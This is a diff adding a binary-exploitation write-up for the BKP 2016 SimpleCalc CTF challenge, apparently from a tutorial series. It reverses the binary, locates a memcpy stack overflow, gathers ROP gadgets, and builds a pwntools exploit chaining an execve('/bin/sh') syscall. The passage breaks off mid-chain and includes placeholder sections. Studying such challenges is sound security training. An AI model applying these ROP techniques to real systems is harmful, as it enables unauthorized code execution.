+ $ id
+ uid=1000(nothing) gid=1000(nothing) groups=1000(nothing),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),113(kaboxer)
+ $ echo $0
+ /bin/bash
+
+
+and we succeeded ! It managed to spawn the bash shell like we wanted.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/2/calc.md b/2/calc.md
new file mode 100644
index 0000000..ba506ea
--- /dev/null
+++ b/2/calc.md
@@ -0,0 +1,851 @@
+# BKP 2016 SimpleCalc
+
+Holy shit there is a HUGE jump in difficulty at this point, buckle up !
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/07-bof_static/bkp16_simplecalc/simplecalc
+ --2021-03-05 18:28:45-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/07-bof_static/bkp16_simplecalc/simplecalc
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/07-bof_static/bkp16_simplecalc/simplecalc [following]
+ --2021-03-05 18:28:46-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/07-bof_static/bkp16_simplecalc/simplecalc
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.108.133, 185.199.111.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 882266 (862K) [application/octet-stream]
+ Saving to: ‘simplecalc’
+
+ simplecalc 100%[============================================================================================================================================================================>] 861.59K 2.36MB/s in 0.4s
+
+ 2021-03-05 18:28:47 (2.36 MB/s) - ‘simplecalc’ saved [882266/882266]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → file simplecalc
+ simplecalc: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=3ca876069b2b8dc3f412c6205592a1d7523ba9ea, not stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → chmod +x simplecalc
+
+
+
+` ![]()
+
+## Solution
+
+First let's check what the binary does by executing it:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → ./simplecalc
+
+ |#------------------------------------#|
+ | Something Calculator |
+ |#------------------------------------#|
+
+ Expected number of calculations: 3
+ Invalid number.
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → ./simplecalc
+
+ |#------------------------------------#|
+ | Something Calculator |
+ |#------------------------------------#|
+
+ Expected number of calculations: 1
+ Invalid number.
+
+
+
+
+The binary file prints out some text, and then asks for some input, and then just says 'invalid' so let's check it from inside ghidra:
+
+
+
+So we get the following code:
+
+
+ undefined8 main(void)
+
+ {
+ undefined auStack72 [40];
+ int iStack32;
+ int iStack28;
+ void *pvStack24;
+ int iStack12;
+
+ iStack28 = 0;
+ setvbuf((FILE *)stdin,(char *)0x0,2,0);
+ setvbuf((FILE *)stdout,(char *)0x0,2,0);
+ print_motd();
+ printf("Expected number of calculations: ");
+ __isoc99_scanf(&DAT;_00494214,&iStack28;);
+ handle_newline();
+ if ((iStack28 < 0x100) && (3 < iStack28)) {
+ pvStack24 = malloc((long)(iStack28 << 2));
+ iStack12 = 0;
+ while (iStack12 < iStack28) {
+ print_menu();
+ __isoc99_scanf(&DAT;_00494214,&iStack32;);
+ handle_newline();
+ if (iStack32 == 1) {
+ adds();
+ *(undefined4 *)((long)iStack12 * 4 + (long)pvStack24) = add._8_4_;
+ }
+ else {
+ if (iStack32 == 2) {
+ subs();
+ *(undefined4 *)((long)iStack12 * 4 + (long)pvStack24) = sub._8_4_;
+ }
+ else {
+ if (iStack32 == 3) {
+ muls();
+ *(undefined4 *)((long)iStack12 * 4 + (long)pvStack24) = mul._8_4_;
+ }
+ else {
+ if (iStack32 == 4) {
+ divs();
+ *(undefined4 *)((long)iStack12 * 4 + (long)pvStack24) = divv._8_4_;
+ }
+ else {
+ if (iStack32 == 5) {
+ memcpy(auStack72,pvStack24,(long)(iStack28 << 2));
+ free(pvStack24);
+ return 0;
+ }
+ puts("Invalid option.\n");
+ }
+ }
+ }
+ }
+ iStack12 = iStack12 + 1;
+ }
+ free(pvStack24);
+ }
+ else {
+ puts("Invalid number.");
+ }
+ return 0;
+ }
+
+
+Here we see that the main function checks if our input number is between 3 and 0x100, if no tit just prints 'Invalid Number' now let's run the binary again to verify that:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → ./simplecalc
+
+ |#------------------------------------#|
+ | Something Calculator |
+ |#------------------------------------#|
+
+ Expected number of calculations: 5
+ Options Menu:
+ [1] Addition.
+ [2] Subtraction.
+ [3] Multiplication.
+ [4] Division.
+ [5] Save and Exit.
+ => 1
+ Integer x: 1
+ Integer y: 2
+ Do you really need help calculating such small numbers?
+ Shame on you... Bye
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → ./simplecalc
+
+ |#------------------------------------#|
+ | Something Calculator |
+ |#------------------------------------#|
+
+ Expected number of calculations: 5
+ Options Menu:
+ [1] Addition.
+ [2] Subtraction.
+ [3] Multiplication.
+ [4] Division.
+ [5] Save and Exit.
+ => 1
+ Integer x: 123456
+ Integer y: 654321
+ Result for x + y is 777777.
+
+ Options Menu:
+ [1] Addition.
+ [2] Subtraction.
+ [3] Multiplication.
+ [4] Division.
+ [5] Save and Exit.
+ => 5
+
+
+
+Now we see some more info about the binary, looking back at the reversed code in ghidra we see some more info:
+
+
+ __isoc99_scanf(&DAT;_00494214,&numberCalcs;);
+ handle_newline();
+ if ((numberCalcs < 0x100) && (3 < numberCalcs)) {
+ calculations = malloc((long)(numberCalcs << 2));
+
+
+after scanning for our input, we give a correct number of calculations, we see that it malloc a size equal to **numberCalcs****< 2 ** and then store the pointer to it in the **calculations** variable this is the same operation as doing numverCalcs * 4. Basically, allocating numberCalcs number of integers which each of them are 4 bytes large. Then it will enter into a while loop that runs once for each calculation we will specify. Looking at the assembly code for the multiplication section, we see the muls function:
+
+
+
+
+ 004014d3 83 f8 03 CMP EAX,0x3
+ 004014d6 75 23 JNZ LAB_004014fb
+ 004014d8 e8 cb fd CALL muls
+
+
+
+Now let's take a look at the muls function:
+
+
+ void muls(void)
+
+ {
+ printf("Integer x: ");
+ __isoc99_scanf(&DAT;_00494214,mul);
+ handle_newline();
+ printf("Integer y: ");
+ __isoc99_scanf(&DAT;_00494214,0x6c4aa4);
+ handle_newline();
+ if ((0x27 < mul._0_4_) && (0x27 < mul._4_4_)) {
+ mul._8_4_ = mul._4_4_ * mul._0_4_;
+ printf("Result for x * y is %d.\n\n",(ulong)mul._8_4_);
+ return;
+ }
+ puts("Do you really need help calculating such small numbers?\nShame on you... Bye");
+ /* WARNING: Subroutine does not return */
+ exit(-1);
+ }
+
+
+Here it basically checks that the 2 numbers are equal or greater to 0x27, The other operations (add, sub, div are p much the same) The bug that we need to notice is at the 5th option:
+
+
+ if (local_20 == 5) {
+ memcpy(local_48,local_18,(long)(local_1c << 2));
+ free(local_18);
+ return 0;
+ }
+
+
+In here there is the memcpy function being used to copy our calculations into**local_48** which is a vulnerable buffer because it does not do a size check, therefore if we have enough calculations, we can overflow the buffer and overwrite the return address because there is no stack canary to prevent this as you can see below:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → pwn checksec simplecalc
+ [*] '/home/nothing/binexp/2/calc/simplecalc'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: No canary found
+ NX: NX enabled
+ PIE: No PIE (0x400000)
+
+
+
+Now from here we want to find the offset between the start of our input and the return address using gdb:
+
+
+
+We want the first breakpoint to be right after the memcpy function so we choose the address of **0x0040154a**
+
+
+ gef➤ b *0x40154a
+ Breakpoint 1 at 0x40154a
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/calc/simplecalc
+
+
+ |#------------------------------------#|
+ | Something Calculator |
+ |#------------------------------------#|
+
+ Expected number of calculations: 50
+ Options Menu:
+ [1] Addition.
+ [2] Subtraction.
+ [3] Multiplication.
+ [4] Division.
+ [5] Save and Exit.
+ => 1
+ Integer x: 13371337
+ Integer y: 13371337
+ Result for x + y is 26742674.
+
+ Options Menu:
+ [1] Addition.
+ [2] Subtraction.
+ [3] Multiplication.
+ [4] Division.
+ [5] Save and Exit.
+ => 5
+
+ Breakpoint 1, 0x000000000040154a in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x00007fffffffdef0 → 0x0000000001980f92
+ $rbx : 0x00000000004002b0 → <_init+0> sub rsp, 0x8
+ $rcx : 0x0
+ $rdx : 0x0
+ $rsp : 0x00007fffffffdee0 → 0x00007fffffffe018 → 0x00007fffffffe34d → "/home/nothing/binexp/2/calc/simplecalc"
+ $rbp : 0x00007fffffffdf30 → 0x0000000000000000
+ $rsi : 0x00000000006c8c98 → 0x0000000000020371
+ $rdi : 0x00007fffffffdfb8 → 0x0000000000000000
+ $rip : 0x000000000040154a → mov rax, QWORD PTR [rbp-0x10]
+ $r8 : 0x0
+ $r9 : 0x0
+ $r10 : 0x0
+ $r11 : 0x0
+ $r12 : 0x0
+ $r13 : 0x0000000000401c00 → <__libc_csu_init+0> push r14
+ $r14 : 0x0000000000401c90 → <__libc_csu_fini+0> push rbx
+ $r15 : 0x0
+ $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffdee0│+0x0000: 0x00007fffffffe018 → 0x00007fffffffe34d → "/home/nothing/binexp/2/calc/simplecalc" ← $rsp
+ 0x00007fffffffdee8│+0x0008: 0x0000000100400d41 ("A\r@"?)
+ 0x00007fffffffdef0│+0x0010: 0x0000000001980f92 ← $rax
+ 0x00007fffffffdef8│+0x0018: 0x0000000000000000
+ 0x00007fffffffdf00│+0x0020: 0x0000000000000000
+ 0x00007fffffffdf08│+0x0028: 0x0000000000000000
+ 0x00007fffffffdf10│+0x0030: 0x0000000000000000
+ 0x00007fffffffdf18│+0x0038: 0x0000000000000000
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x40153d rex.RB ror BYTE PTR [r8-0x77], 0xce
+ 0x401542 mov rdi, rax
+ 0x401545 call 0x4228d0
+ ●→ 0x40154a mov rax, QWORD PTR [rbp-0x10]
+ 0x40154e mov rdi, rax
+ 0x401551 call 0x4156d0
+ 0x401556 mov eax, 0x0
+ 0x40155b jmp 0x401588
+ 0x40155d mov edi, 0x494402
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "simplecalc", stopped 0x40154a in main (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x40154a → main()
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+
+Here we first set the breakpoint at **0x40154a** , then we ran the binary, we selected 50 calculations, then made an addition with the 2 numbers 13371337 and 13371337 which gave us a result of **26742674** , and then we selected 5 to exit and reach the **memcpy** call and thus, our breakpoint, Now what we want to know is where is the result (26742674) stored ? To know this, we need to first know the hex value of our result:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/calc]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex(26742674)
+ '0x1980f92'
+
+
+
+Now we know that we have to find **0x1980f92** in memory, so we search for the 0x1980f92 pattern in gdb :
+
+
+ gef➤ search-pattern '0x1980f92'
+ [+] Searching '0x1980f92' in memory
+ gef➤ search-pattern 0x1980f92
+ [+] Searching '0x1980f92' in memory
+ gef➤
+
+
+Now as you can see **0x198 0f92** is 7 bytes long. if we try to search that pattern, we won't find it:
+
+
+
+ gef➤ search-pattern 0x1980f92
+ [+] Searching '0x1980f92' in memory
+
+
+
+So here we need to add an extra zero to end up with 8 bytes: **0x0198 0f92** and then we can find the pattern in memory:
+
+
+ gef➤ search-pattern 0x01980f92
+ [+] Searching '\x92\x0f\x98\x01' in memory
+ [+] In '[heap]'(0x6c3000-0x6e9000), permission=rw-
+ 0x6c4a88 - 0x6c4a98 → "\x92\x0f\x98\x01[...]"
+ 0x6c8bd0 - 0x6c8be0 → "\x92\x0f\x98\x01[...]"
+ [+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
+ 0x7fffffffb158 - 0x7fffffffb168 → "\x92\x0f\x98\x01[...]"
+ 0x7fffffffdef0 - 0x7fffffffdf00 → "\x92\x0f\x98\x01[...]"
+
+ gef➤ info frame
+ Stack level 0, frame at 0x7fffffffdf40:
+ rip = 0x40154a in main; saved rip = 0x0
+ Arglist at 0x7fffffffdf30, args:
+ Locals at 0x7fffffffdf30, Previous frame's sp is 0x7fffffffdf40
+ Saved registers:
+ rbp at 0x7fffffffdf30, rip at 0x7fffffffdf38
+
+
+
+Now here we see that the pattern is at **0x7fffffffdef0** and the return address is at **0x7fffffffdf38**. So we can calculate the offset:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [blog/binexp/2]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex( 0x7fffffffdef0 - 0x7fffffffdf38 )
+ '-0x48'
+
+
+
+Now we know that there is a 0x48 bytes offset between the pattern an the return call. There are 4 bytes for each integer, so we can divide it by 4:
+
+
+ >>> int(0x48)
+ 72
+ >>> int(72 / 4)
+ 18
+
+
+
+Now we know that we will need 18 integers, Now since the binary is statically linked and there is no PIE (as we saw earlier in the pwn checksec command output), We can build a rop chain using the binary for gadgets and without an infoleak. The ROP chain will make an execve syscall to **/bin/sh** just like in the previous tutorials except that now we need to take into account 4 registers that we need to control in order to make this syscall:
+
+As we saw in our [previous](../asm/2.html) x86_64 assembly tutorials, we need rax to take in our syscall ID, rdi to take the first arguement, rsi to take the 2nd arguement and rdx to take the third arguement. We can use this list to know more about syscalls, and since we are in x86_64 we will use the syscall ID 59 (0x3b) to trigger execve:
+
+
+ rax : 0x3b # syscall ID
+ rdi : ptr to "/bin//sh" # arg 1 to spawn /bin/sh
+ rsi : 0x0 # arg 2
+ rdx : 0x0 # arg 3
+
+
+To do this, we need what's known as 'gadgets' to control those 4 registers. to find these gadgets we will use the following template**pop rax; ret**. we will use [ROPGadget.py](https://github.com/JonathanSalwan/ROPgadget):
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [~]
+ → sudo pip3 install capstone
+ [sudo] password for nothing:
+ Requirement already satisfied: capstone in /usr/lib/python3.9/site-packages (4.0.2)
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [~]
+ → cd /opt
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [/opt]
+ → git clone https://github.com/JonathanSalwan/ROPgadget
+ fatal: could not create work tree dir 'ROPgadget': Permission denied
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [/opt]
+ → sudo !!
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [/opt]
+ → sudo git clone https://github.com/JonathanSalwan/ROPgadget
+ Cloning into 'ROPgadget'...
+ remote: Enumerating objects: 20, done.
+ remote: Counting objects: 100% (20/20), done.
+ remote: Compressing objects: 100% (14/14), done.
+ remote: Total 3715 (delta 7), reused 12 (delta 6), pack-reused 3695
+ Receiving objects: 100% (3715/3715), 22.62 MiB | 6.86 MiB/s, done.
+ Resolving deltas: 100% (2286/2286), done.
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [/opt]
+ → cd ROPgadget
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [/opt/ROPgadget]
+ → ls
+ AUTHORS LICENSE_BSD.txt README.md ropgadget ROPgadget.py scripts setup.cfg setup.py test-suite-binaries
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [/opt/ROPgadget]
+ → echo $PATH
+ /usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/lib/jvm/default/bin:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/core_perl:/var/lib/snapd/snap/bin
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [/opt/ROPgadget]
+ → sudo ln -s ROPgadget.py /usr/local/bin/ROPgadget.py
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [/opt/ROPgadget]
+ → ROPgadget
+ [Error] Need a binary filename (--binary/--console or --help)
+
+
+
+Once that's done we can continue and find the gadgets of rax, rdi, rsi and rdx:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → ROPgadget --binary simplecalc | grep "pop rax ; ret"
+ 0x000000000044db32 : add al, ch ; pop rax ; ret
+ 0x000000000040b032 : add al, ch ; pop rax ; retf 2
+ 0x000000000040b02f : add byte ptr [rax], 0 ; add al, ch ; pop rax ; retf 2
+ 0x000000000040b030 : add byte ptr [rax], al ; add al, ch ; pop rax ; retf 2
+ 0x00000000004b0801 : in al, 0x4c ; pop rax ; retf
+ 0x000000000040b02e : in al, dx ; add byte ptr [rax], 0 ; add al, ch ; pop rax ; retf 2
+ 0x0000000000474855 : or dh, byte ptr [rcx] ; ror byte ptr [rax - 0x7d], 0xc4 ; pop rax ; ret
+ 0x000000000044db34 : pop rax ; ret
+ 0x000000000045d707 : pop rax ; retf
+ 0x000000000040b034 : pop rax ; retf 2
+ 0x0000000000474857 : ror byte ptr [rax - 0x7d], 0xc4 ; pop rax ; ret
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → ROPgadget --binary simplecalc | grep "pop rdi ; ret"
+ 0x000000000044bbbc : inc dword ptr [rbx - 0x7bf0fe40] ; pop rdi ; ret
+ 0x0000000000401b73 : pop rdi ; ret
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → ROPgadget --binary simplecalc | grep "pop rsi ; ret"
+ 0x00000000004ac9b4 : add byte ptr [rax], al ; add byte ptr [rax], al ; pop rsi ; ret
+ 0x00000000004ac9b6 : add byte ptr [rax], al ; pop rsi ; ret
+ 0x0000000000437aa9 : pop rdx ; pop rsi ; ret
+ 0x0000000000401c87 : pop rsi ; ret
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → ROPgadget --binary simplecalc | grep "pop rdx ; ret"
+ 0x00000000004a868c : add byte ptr [rax], al ; add byte ptr [rax], al ; pop rdx ; ret 0x45
+ 0x00000000004a868e : add byte ptr [rax], al ; pop rdx ; ret 0x45
+ 0x00000000004afd61 : js 0x4afdde ; pop rdx ; retf
+ 0x0000000000414ed0 : or al, ch ; pop rdx ; ret 0xffff
+ 0x0000000000437a85 : pop rdx ; ret
+ 0x00000000004a8690 : pop rdx ; ret 0x45
+ 0x00000000004b2dd8 : pop rdx ; ret 0xfffd
+ 0x0000000000414ed2 : pop rdx ; ret 0xffff
+ 0x00000000004afd63 : pop rdx ; retf
+ 0x000000000044af60 : pop rdx ; retf 0xffff
+ 0x00000000004560ae : test byte ptr [rdi - 0x1600002f], al ; pop rdx ; ret
+
+
+
+Now we know that the gadgets we need to control the 4 registers are :
+
+
+ rax: 0x44db34
+ rdi: 0x401b73
+ rsi: 0x401c87
+ rdx: 0x437a85
+
+
+
+Now this is where the writeup of this binary challenge hits a very random point. you basically have to find a gadget that will write an eight byte value to a memory region, and it's a mov involving that will move 4 bytes from **rdx** to whatever memory is **pointed** by **rax** :
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → ROPgadget --binary simplecalc | grep "mov" | grep "rdx" | grep "\[rax\]" | grep "ptr"
+
+
+
+
+ 0x000000000046a7a9 : mov qword ptr [rax], rdx ; jmp 0x46a257
+ 0x0000000000461a5f : mov qword ptr [rax], rdx ; mov eax, dword ptr [rsi] ; pop rbx ; ret
+ 0x000000000040274f : mov qword ptr [rax], rdx ; mov edx, 0xfe8 ; jmp 0x4026b4
+ 0x000000000046277d : mov qword ptr [rax], rdx ; mov qword ptr [rax + 0x40], rsi ; jmp 0x46272c
+ 0x000000000040a3ee : mov qword ptr [rax], rdx ; mov qword ptr [rax + 8], rdx ; jmp 0x40a102
+ 0x000000000047efb8 : mov qword ptr [rax], rdx ; pop rbx ; ret
+
+ **0x000000000044526e : mov qword ptr [rax], rdx ; ret**
+
+ 0x0000000000462730 : mov qword ptr [rax], rdx ; xor eax, eax ; ret
+
+
+
+So here we see at the address **0x0044526e** that this mov instruction will move the value of rdx into the memory address that is pointed by rax. This is also convenient because we have gadgets for the rdx and rax registers. The last gadget we need is a syscall gadget:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → ROPgadget --binary simplecalc | grep ": syscall"
+ 0x0000000000400488 : syscall
+
+
+
+We don't have a choice here, the only syscall is at **0x00400488** , Now we need to figure out where in memory we will write the string **/bin/sh** So we need to check the memory mappings while the binary is running:
+
+
+ gef➤ vmmap
+ [ Legend: Code | Heap | Stack ]
+ Start End Offset Perm Path
+ 0x0000000000400000 0x00000000004c1000 0x0000000000000000 r-x /home/nothing/binexp/2/calc/simplecalc
+ 0x00000000006c0000 0x00000000006c3000 0x00000000000c0000 rw- /home/nothing/binexp/2/calc/simplecalc
+ 0x00000000006c3000 0x00000000006e9000 0x0000000000000000 rw- [heap]
+ 0x00007ffff7ff9000 0x00007ffff7ffd000 0x0000000000000000 r-- [vvar]
+ 0x00007ffff7ffd000 0x00007ffff7fff000 0x0000000000000000 r-x [vdso]
+ 0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rw- [stack]
+ 0xffffffffff600000 0xffffffffff601000 0x0000000000000000 --x [vsyscall]
+
+
+
+We see that the memory region begins at **0x6c1000** and ends at **0x6c3000** the permissions allow us to read and write to it, and in addition, that is mapped from the binary. Since there is no PIE the addresses will be the same everytime, therefore we don't need an infoleak. Here we want to take a look at the memory addresses after**0x6c0000** to see if we can find an empty space where we can write our stuff:
+
+
+ gef➤ x/g 0x6c0000
+ 0x6c0000: 0x200e41280e41300e
+
+ gef➤ x/20g 0x6c0000
+ 0x6c0000: 0x200e41280e41300e 0xe42100e42180e42
+ 0x6c0010: 0xb4108 0xd0a40000002c
+ 0x6c0020: 0x6cfffd1fd0 0x80e0a69100e4400
+ 0x6c0030: 0xb42080e0a460b4b 0xe470b49080e0a57
+ 0x6c0040: 0x8 0xd0d400000024
+ 0x6c0050: 0x144fffd2010 0x5a020283100e4500
+ 0x6c0060: 0xee3020b41080e0a 0x8
+ 0x6c0070: 0xd0fc00000064 0x26cfffd2138
+ 0x6c0080: 0xe47028f100e4200 0x48d200e42038e18
+ 0x6c0090: 0x300e41058c280e42 0x440783380e410686
+
+ gef➤ x/20g 0x6c1000
+ 0x6c1000: 0x0 0x0
+ 0x6c1010: 0x0 0x431070
+ 0x6c1020: 0x430a40 0x428e20
+ 0x6c1030: 0x4331b0 0x424c50
+ 0x6c1040: 0x42b940 0x423740
+ 0x6c1050: 0x4852d0 0x4178d0
+ 0x6c1060: 0x0 0x0
+ 0x6c1070 <****_dl_tls_static_size>: 0x1180 0x0
+ 0x6c1080 <****_nl_current_default_domain>: 0x4945f7 0x0
+ 0x6c1090 <****locale_alias_path.10061>: 0x49462a 0x6c32a0
+
+It looks like **0x6c1000** is empty, so we should be able to write to it without messing up anything.
+
+Now we need to worry about what deals with what we are overflowing onto the stack:
+
+
+ **************************************************************
+ * FUNCTION *
+ **************************************************************
+ undefined main()
+ undefined AL:1
+ undefined4 Stack[-0xc]:4 local_c XREF[7]: 00401443(W),
+ 00401481(R),
+ 004014af(R),
+ 004014dd(R),
+ 00401508(R),
+ 00401567(RW),
+ 0040156e(R)
+ undefined8 Stack[-0x18]:8 local_18 XREF[8]: 0040143f(W),
+ 0040148e(R),
+ 004014bc(R),
+ 004014ea(R),
+ 00401515(R),
+ 00401537(R),
+ 0040154a(R),
+ 00401577(R)
+ undefined4 Stack[-0x1c]:4 local_1c XREF[7]: 00401392(W),
+ 004013e9(*),
+ 00401409(R),
+ 00401413(R),
+ 0040142f(R),
+ 0040152e(R),
+ 0040156b(R)
+ undefined4 Stack[-0x20]:4 local_20 XREF[6]: 00401454(*),
+ 00401474(R),
+ 004014a2(R),
+ 004014d0(R),
+ 004014fb(R),
+ 00401526(R)
+ undefined1 Stack[-0x48]:1 local_48 XREF[1]: 0040153b(*)
+ undefined4 Stack[-0x4c]:4 local_4c XREF[1]: 0040138b(W)
+ undefined8 Stack[-0x58]:8 local_58 XREF[1]: 0040138e(W)
+ main XREF[4]: Entry Point(*),
+ _start:00400f6b(*),
+ _start:00400f6b(*), 004b3078(*)
+ 00401383 55 PUSH RBP
+
+
+
+
+ if (local_20 == 5) {
+ memcpy(local_48,local_18,(long)(local_1c << 2));
+ free(local_18);
+ return 0;
+ }
+
+
+So here we see that between the vulnerable buffer **local_48** (which is handled inside of the vulnerable memcpy call we saw earlier) and the bottom of the stack there is the **local_18** pointer that contains our calculations. It will get overwritten as part of the overflow. This is a problem since this address is freed prior to our code being executed as you can see above.
+
+Now the trick here was that you needed to take a look at the [sourcecode](https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#free) of the free functioni (lines 3092- 3103):
+
+
+ void
+ __libc_free (void *mem)
+ {
+ mstate ar_ptr;
+ mchunkptr p; /* chunk corresponding to mem */
+ void (*hook) (void *, const void *)
+ = atomic_forced_read (__free_hook);
+ if (__builtin_expect (hook != NULL, 0))
+ {
+ (*hook)(mem, RETURN_ADDRESS (0));
+ return;
+
+
+Here you see that if the arguement to the free() function is a null pointer (0x0) then it just returns. Since the function writing the data for the overflow is memcpy, we can just write null bytes. So if we just fill up the space between the start of our input and the return address with null bytes, we will be fine. With that, we can now create the exploit including the ROP chain to spawn a shell and print out the flag:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+
+ #target is the variable for the process ./simplecalc
+ target = process('./simplecalc')
+
+ #recieve text until calculations:
+ target.recvuntil('calculations: ')
+ #we want 100 calculations)
+ target.sendline('100')
+
+
+
+
+Now here we use the 'target' variable to follow the process of our binary, we want to recieve the output text until 'calculations: ', Then we want to send '100' as our choice for calculations. Next we will setup our rop gadgets:
+
+
+ # Establish our rop gadgets
+ popRax = 0x44db34
+ popRdi = 0x401b73
+ popRsi = 0x401c87
+ popRdx = 0x437a85
+
+ # 0x000000000044526e : mov qword ptr [rax], rdx ; ret
+ movGadget = 0x44526e
+ syscall = 0x400488
+
+
+
+So here we set the constants we found earlier the addresses of the Rax, rdi, rsi and rdx gadgets, as well as the movGadget and the syscall we need. Next we need to submit an 'addition'(option 1) to the binary file of x=100 and y=arguement - 100:
+
+
+ def addSingle(x):
+ target.recvuntil("=> ")
+ target.sendline("1")
+
+ target.recvuntil("Integer x: ")
+ target.sendline("100")
+
+ target.recvuntil("Integer y: ")
+ target.sendline(str(x - 100)) #making use the arguement being passed into the function here
+
+
+
+And the second function makes use of the function we defined above:
+
+
+ def add(z):
+ x = z & 0xffffffff
+ y = ((z & 0xffffffff00000000) >> 32)
+ addSingle(x)
+ addSingle(y)
+
+ # Fill up the space between the start of our input and the return address
+ for i in range(9):
+ # Fill it up with null bytes, to make the ptr passed to free be a null pointer
+ # So free doesn't crash
+ add(0x0)
+
+
+
+This will make sure we fill up the space between the start of our input and the return address with 9 nullbytes to make the ptr passed to the free() function be a null pointer. The add() function that is defined here makes use of addSingle() that we defined above. These 2 additions will nake sure that we give input via addition, and next we need to make our actual ROP chain:
+
+
+ #Write "/bin/sh" to 0x6c1000
+
+ #pop rax, 0x6c1000 ; ret
+ #pop rdx, "/bin/sh\x00" ; ret
+ #mov qword ptr [rax], rdx ; ret
+
+
+ add(popRax)
+ add(0x6c1000)
+
+ add(popRdx)
+ add(0x0068732f6e69622f) # "/bin/sh" in hex
+
+
+
+
+This will make use of the 'add' function we defined above, to put the value of popRax(0x44db34) to the ROPchain, as well as our actual shellcode:
+
+
+ # Move the needed values into the registers
+ #pop rax, 0x3b ; ret
+ #pop rdi, 0x6c1000 ; ret
+ #pop rsi, 0x0 ; ret
+ #pop rdx, 0x0 ; ret
+
+ add(movGadget)
+
+ add(popRax) # Specify which syscall to make
+ add(0x3b)
+
+ add(popRdi) # Specify pointer to "/bin/sh"
+ add(0x6c1000)
+
+ add(popRsi) # Specify no arguments or environment variables
